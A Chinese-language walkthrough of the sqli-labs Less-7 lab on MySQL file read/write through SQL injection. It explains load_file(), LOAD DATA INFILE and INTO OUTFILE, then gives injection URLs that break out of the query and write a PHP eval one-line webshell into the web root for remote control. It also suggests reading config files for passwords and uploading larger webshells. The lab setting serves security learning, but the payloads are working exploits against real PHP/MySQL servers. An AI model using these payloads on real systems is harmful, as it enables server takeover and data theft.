Sqli_libs--Less07-文件写入

7.Less07–文件写入

参考链接：MYSQL注入天书之导入导出介绍

7.1、知识拓展

如果执行以下命令产生把报错啥的，可能是权限问题，可参考文章：
Mysql 命令 load data infile 权限问题

7.1.1、Load_file()导出文件

load_file()函数：读取一个文件并将其文件内容作为字符串返回。

使用条件：

• 需要读取的文件必须位于服务器主机上
• 必须指定完整路径的文件
• 必须有文件的file权限，且文件所有字节可读

  and (select count(*) from mysql.user)>0 
  						//如果返回正常，说明具有读写权限
  						//如果返回错误，应该是管理员给数据库账户降权了
  						
  如果是登录了phpMyadmin：假设登录用户为ebank
  首先通过show grants命令查看ebank用户是否具有导出数据的file权限，如下代码所示：
  mysql> show grants for ebank@"%";

• 文件内容必须小于max_allowed_packet。

如果该文件不存在，或因为上面的任一原因而不能被读出，函数返回空。比较难满足的就是权限，在windows下，如果NTFS设置得当，是不能读取相关的文件的，当遇到只有administrators才能访问的文件，users就别想load_file出来。

NTFS（New Technology File System）是Windows NT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式，提供长文件名、数据保护和恢复，能通过目录和文件许可实现安全性，并支持跨越分区。

在满足上面条件后，我们还需要知道的就是文件的路径 ---- 便于我们上传后进行访问。
构造畸形语句，爆出绝对路径。

在很多PHP程序中，当提交一个错误的Query，如果display_errors = on，程序就会暴露WEB目录的绝对路径，只要知道路径，那么对于一个可以注入的PHP程序来说，整个服务器的安全将受到严重的威胁。

Windows/Linux平台下的常用路径：

示例：Select

1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))
利用hex()将文件内容导出来，尤其是smb文件时可以使用。
			
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) 
Explain："char(99,58,47,98,111,111,116,46,105,110,105)"就是"c:/boot.ini"的ASCII代码
							
 
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69) 
Explain："c:/boot.ini"的16进制是"0x633a2f626f6f742e696e69"
 
-1 union select 1,1,1,load_file(c:\\boot.ini) 
Explain:路径里的/用 \\代替

我把语句带入到phpmyadmin中进行尝试了一下，发现执行时总会报1290错误，百度后原来是mysql设置的可操作路径的权限，可以使用show variables like '%secure%'，看 secure-file-priv 当前的值是什么。

修改配置可修改mysql配置文件my.ini，查看是否有

secure_file_priv =
这样一行内容，如果没有，则手动添加，
secure_file_priv = /home
表示限制为/home文件夹
secure_file_priv =
表示不限制目录，等号一定要有，否则mysql无法启动
修改完配置文件后，重启mysql生效

如下，重新加载文件.
PS：文件只能是在“secure_file_priv ”制定的路径下的文件。

7.1.2、load_data-infile()文件导入数据库

LOAD DATA INFILE语句用于高速地从一个文本文件中读取行，并装入一个表中。文件名称必须为一个文字字符串。

在注入过程中，我们往往需要一些特殊的文件，比如配置文件，密码文件等。当你具有数据库的权限时，可以将系统文件利用load data infile导入到数据库中。

函数具体介绍：对于参数介绍这里就不过多的赘述了，可以参考mysql的文档。（提醒：参考文档才是最佳的学习资料）

示例：（与上面导出文件类似，文件只能是在“secure_file_priv ”制定的路径下的文件。）

load data infile 'E:\\xampp\\htdocs\\upload\\1.txt' ignore into table test character set gbk fields terminated by '\t' lines terminated by '\n'

将 e:/xampp/htdocs/1.txt 导入到 test 表中，character set gbk是字符集设置为gbk，fields terminated by是每一项数据之间的分隔符，lines terminated by 是行的结尾符。
当错误代码是2的时候的时候，文件不存在，错误代码为13的时候是没有权限，可以考虑/tmp等文件夹。

TIPS：我们从mysql5.7的文档看到添加了load xml函数，是否依旧能够用来做注入还需要验证。

代码如下，执行成功。

然后，我们查看test表中的内容。

7.1.3、导入文件select……into outfile ‘file_name’

select……into outfile 'file_name'

该命令与load data infile命令作用相反，将查询结果输出保存到一个文件中。
可以把被选择的行写入一个文件中。该文件被创建到服务器主机上，因此您必须拥有FILE权限，才能使用此语法。file_name不能是一个已经存在的文件。

在这我参考的文章作者运用了两种方法:

• 1.直接将select内容导入到文件。

 select version() into outfile 'E:\\xampp\\htdocs\\upload\\test.php'

如下， 可执行成功。

在这里可以将version()替换成一句话，<? php @eval($_POST["muma"]); ?>，也即 Select <?php @eval($_post["mima"])?> into outfile "c:\\phpnow\\htdocs\\test.php"，然后直接连接一句话就可以了。

其实在select内容中不仅仅是可以上传一句话的，也可以上传很多的内容。（这句话就很神奇了，希望以后有机会可以碰上其他骚姿势啦！）

• 2.修改文件结尾

Select version() Into outfile "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x16进制文件

解释：通常是用’\r\n’结尾，此处我们修改为自己想要的任何文件。同时可以用FIELDS TERMINATED BY

16进制可以为一句话或者其他任何的代码，可自行构造。在sqlmap中os-shell采取的就是这样的方式（说实话，这篇文章着实没怎么看懂，但是让我再一次见识到了sqlmap的强大，还有大佬的有趣生活！）
具体可参考os-shell分析文章：http://www.cnblogs.com/lcamry/p/5505110.html

TIPS：厉害了，我的哥！

（1）可能在文件路径当中要注意转义，这个要看具体的环境
（2）上述我们提到了load_file(),但是当前台无法导出数据的时候，我们可以利用下面的语句：
select load_file('c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini')into outfile 'c:\\wamp\\www\\test.php'
可以利用该语句将服务器当中的内容导入到web服务器下的目录，这样就可以得到数据了。上述my.ini当中存在password项（不过默认被注释），当然会有很多的内容可以被导出来，这个要平时积累。

7.2、报错测试

输入以下语句：

http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1’ 【单引号，报错】
http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1" 【双引号，正常】
http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1‘ %23 【单引号+注释，报错】
http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1’) %23 【单引号+括号+注释，报错】
http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1’)) %23 【单引号+括号+括号+注释，正常】

可见这一关的闭合方式可能是 “单引号+括号+括号”

http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1')) %23

这一关的名字为 dump into outfile，即写入写出文件。

7.3、数据显示

注入语句可以参考上面的语句。

查看用户是否有file权限。

http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 %23

如下，正常显示。

将select查询到的内容写入到文件中，

http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1')) union select 1,2,3 into outfile "e:\\xampp\\htdocs\\upload\\test01.txt" %23

如下，虽然在网页上显示有一个error，但是依旧是写入成功。

写入一句话木马。
类似于7.1.背景知识中提到的，我们直接将一句话木马导入进去。我们先将一句话的txt文件写入，发现不报错。

http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["test"]);?>'  into outfile "e:\\xampp\\htdocs\\upload\\test_muma.txt" %23

然后，我们将一句话木马以php文件写入。如下，写入成功。接下来，我们可以用菜刀直接进行连接啦。

http://192.168.10.208:8081/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["test"]);?>'  into outfile "e:\\xampp\\htdocs\\upload\\test_muma.php" %23

除此之外，还可以导入一些大马之类的文件进行访问，任各位发挥想象啦！

7.4、代码分析

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}